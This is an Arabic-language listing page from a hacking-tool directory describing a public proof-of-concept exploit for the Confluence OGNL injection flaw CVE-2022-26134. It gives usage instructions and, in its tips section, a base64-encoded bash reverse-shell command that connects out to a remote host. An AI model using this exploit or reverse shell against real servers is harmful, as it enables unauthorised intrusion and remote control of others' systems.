Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-26134 — [CVE-2022-26134]Confluence ثغرة RCE عبر حقن تعبير OGNL مع تجاوز sandbox bypass. | Kitploit
أدوات/GitHubGitHub/sncker/cve-2022-26134
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubsncker/cve-2022-26134

CVE-2022-26134

[CVE-2022-26134]Confluence ثغرة RCE عبر حقن تعبير OGNL مع تجاوز sandbox bypass.

عرض المستودع
268منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-26134

حقن تعبير OGNL في Confluence يؤدي إلى RCE(CVE-2022-26134) برهان المفهوم والاستغلال

تحديث

إضافة تجاوز الصندوق الرملي (sandbox bypass)، ودعم الإصدارات العالية.

الاستخدام

root@kitploit:~
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/

سيتحقق السكريبت تلقائياً من وجود الثغرة في الهدف، وسيدخل إلى شبه شيل تفاعلي إذا كان الهدف ضعيفاً.

اختبار تحت لينكس:
linux

اختبار تحت ويندوز:
windows

فقط أدخل 'q' عند الرغبة في الخروج.

بعض النصائح

يتم تمرير معاملات الأوامر مباشرة إلى دالة runtime.exec، التي لا تملك سياق الشيل.
لذا.
تحت ويندوز، لا يمكن تنفيذ بعض الأوامر مثل dir مباشرة، يمكنك استخدام cmd.exe /c dir.
تحت لينكس، لا يمكن لبعض الرموز الخاصة أن تعمل. إذا كنت بحاجة لتنفيذ أمر يحتوي على رموز خاصة مثل reverse shell، يمكنك ترميزه بـ base64 ثم استخدام bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}.

تنزيل الأداة